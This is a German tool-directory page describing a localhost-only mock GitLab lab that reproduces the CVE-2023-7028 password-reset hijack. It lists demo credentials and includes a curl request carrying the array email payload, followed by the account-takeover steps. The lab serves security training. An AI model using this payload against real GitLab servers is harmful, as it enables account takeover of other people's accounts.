Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Einreichen
ToolsExploitsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
GitLab-CVE-2023-7028 — # Mock-verwundbare GitLab-Instanz, die den Passwort-Reset-Hijack CVE-2023-7028 reproduziert Demonstriert die Ausnutzung des array-basierten E-Mail-Parameters und die Übernahme von Konten. Nur für den Einsatz in Bildungslaboren. | Kitploit
Tools/GitHubGitHub/feartheploto/gitlab-cve-2023-7028
SchwachstellenanalyseExploitationWebanwendungs-ExploitationLernen & BildungLabs & Praxis
GitHubfeartheploto/gitlab-cve-2023-7028

GitLab-CVE-2023-7028

# Mock-verwundbare GitLab-Instanz, die den Passwort-Reset-Hijack CVE-2023-7028 reproduziert Demonstriert die Ausnutzung des array-basierten E-Mail-Parameters und die Übernahme von Konten. Nur für den Einsatz in Bildungslaboren.

Repository anzeigen
7vor 20 TagenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

GitLab CVE-2023-7028 — Mock 16.6.0 (nur Host)

CVE-2023-7028 (CVSS 10.0): POST /users/password akzeptierte das Array user[email][] — der Server fand den Benutzer über email[0], sendete aber dasselbe Reset-Token an jede Adresse → ein Angreifer mit [email protected] übernimmt [email protected]. Betroffen: GitLab CE/EE <16.5.6, <16.6.4, <16.7.2. Dieser Mock reproduziert den verwundbaren Ablauf von 16.6.0 (JSON-DB, kein SMTP).

Ausführen

npm install && npm start → http://127.0.0.1:3000 (oder PORT=3001 npm start; automatische Wiederholung bei Belegung; nur localhost). Vorbefüllt: [email protected]/s3cur3P@ss!, , in .

[email protected]/BobSecure1!
[email protected]/5iveL!fe
data/users.json

Reproduzieren

curl -X POST http://127.0.0.1:3000/users/password -d "user[email][][email protected]&user[email][][email protected]" Prüfe http://127.0.0.1:3000/mailbox oder /api/emails — beide erhalten dasselbe Token. Öffne .../users/password/edit?reset_password_token=TOKEN, um die Konten zu übernehmen. Normal: user[email][email protected] → eine E-Mail. Das Postfach zeigt jede E-Mail; nichts verlässt den Host. MIT — nur für Labore, nicht öffentlich zugänglich machen.

Tool herunterladen